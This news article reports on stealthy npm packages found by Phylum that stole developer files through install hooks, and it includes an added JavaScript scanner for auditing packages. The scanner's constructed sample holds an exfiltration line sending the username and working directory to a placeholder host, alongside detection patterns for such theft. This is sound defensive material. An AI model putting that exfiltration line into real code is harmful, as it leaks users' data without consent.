Stealthy npm Malware Exposes Developer Data
Stealthy malware has been discovered on npm, the popular package manager for JavaScript, that poses a severe threat by exposing sensitive developer data.
The findings come from cybersecurity firm Phylum, which said that on July 31, 2023, its automated risk detection platform raised an alert regarding suspicious activity on npm.
Over the course of a few hours, ten seemingly innocuous “test” packages were published. On closer inspection, Phylum’s researchers discovered that these packages were part of a sophisticated and targeted malware attack aimed at exfiltrating sensitive developer source code and confidential information.
The attack demonstrated a carefully crafted development cycle, with the attacker refining the malware’s functionality through several iterations. The final “production” packages were disguised with legitimate-sounding names, potentially tricking victims into installing them unwittingly.
Read more on typosquatting: Malicious Npm Package Uses Typosquatting, Downloads Malware
Upon analyzing the attack code, Phylum uncovered that it utilized a combination of post-install hooks and pre-install scripts to trigger the execution of malicious code once the packages were installed. This code was designed to perform several actions.
First, the malware gathered the machine’s operating system (OS) username and current working directory and sent this information as URL query parameters in an HTTP GET request to a remote server.
Next, the malware scanned the victim’s directories for files with specific extensions or located in specific directories known to contain sensitive information, such as credentials or configuration files.
Once the target files and directories were identified, the malware created ZIP archives, excluding certain standard application directories to avoid unnecessary bulk. Finally, the malware attempted to upload the compressed archives to an FTP server.
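The behaviour described above (install-time hooks that collect the username and working directory, walk the file system, archive files and hand them to HTTP and FTP clients) is something a defender can screen for before a package ever runs. The following is an added example, not Phylum's code and not taken from the packages in the report: a small audit that flags an npm manifest whose lifecycle scripts would execute during `npm install`, and scores the referenced script against those indicators. All package contents, file names and the `collector.invalid` host are constructed samples.

```javascript
"use strict";

// Lifecycle hooks that npm runs automatically during `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators; each corresponds to a behaviour the report attributes to the malware.
const INDICATORS = [
  { name: "os-username", re: /os\.userInfo\(|process\.env\.(USER|USERNAME)\b/ },
  { name: "working-dir", re: /process\.cwd\(\)/ },
  { name: "http-request", re: /\bhttps?\.(get|request)\(|\bfetch\(/ },
  { name: "fs-walk", re: /readdirSync|readdir\(|statSync/ },
  { name: "archive", re: /\b(zip|archiver|tar)\b/i },
  { name: "ftp-upload", re: /\bftp\b/i },
];

// pkg: parsed package.json; scriptSources: map of file name -> source text (assumed
// to have been read from the unpacked tarball by the caller).
function auditPackage(pkg, scriptSources = {}) {
  const hooks = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = scripts[hook];
    const finding = { hook, command, indicators: [] };
    // "node index.js" -> look up index.js among the supplied sources.
    const m = command.match(/\bnode\s+([^\s;&|]+)/);
    const src = m ? scriptSources[m[1]] : undefined;
    if (src) {
      for (const ind of INDICATORS) {
        if (ind.re.test(src)) finding.indicators.push(ind.name);
      }
    }
    hooks.push(finding);
  }
  const score = hooks.reduce((n, f) => n + f.indicators.length, 0);
  // Any install hook deserves a look; several exfiltration indicators together is a block.
  const verdict = score >= 3 ? "block" : hooks.length ? "review" : "allow";
  return { hooks, score, verdict };
}

// Constructed sample: a package that only declares a test script.
const BENIGN = { name: "sample-lib", version: "1.0.0", scripts: { test: "jest" } };

// Constructed sample: a native addon rebuild in postinstall, common and legitimate
// but still worth a human look because it runs code at install time.
const NATIVE_ADDON = { name: "sample-addon", version: "2.1.0", scripts: { postinstall: "node-gyp rebuild" } };

// Constructed sample modelled on the report: a postinstall hook runs a script that
// references the username, the working directory, a directory walk, an archive
// library and HTTP/FTP clients. These are fragments for the scanner, not a working script.
const SUSPICIOUS = { name: "sample-test-pkg", version: "0.0.3", scripts: { postinstall: "node index.js" } };
const SUSPICIOUS_SOURCES = {
  "index.js": [
    'const os = require("os"), fs = require("fs"), https = require("https");',
    'const AdmZip = require("adm-zip"); const ftp = require("basic-ftp");',
    'https.get("https://collector.invalid/?u=" + os.userInfo().username + "&d=" + process.cwd());',
    "for (const f of fs.readdirSync(process.cwd())) { /* ... */ }",
  ].join("\n"),
};

// Runs the audit over the three constructed samples and returns the reports.
function runDemo() {
  return {
    benign: auditPackage(BENIGN),
    nativeAddon: auditPackage(NATIVE_ADDON),
    suspicious: auditPackage(SUSPICIOUS, SUSPICIOUS_SOURCES),
  };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

In practice this sort of check belongs in CI or a pre-install gate, fed from the unpacked tarball rather than trusted source, and the thresholds are a starting point: a native addon rebuild will always land in "review", while a script that touches the username, working directory, file system, an archiver and a network client at install time has no ordinary reason to exist.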
In an advisory published on Thursday, Phylum’s experts noted that the attack’s primary targets appeared to be developers involved in the cryptocurrency sphere.
The advisory also contains additional information about the attack, including the source code of the malware and more details about the attack chain.
Its publication comes hours after ReversingLabs discovered new malicious packages on the PyPI repository.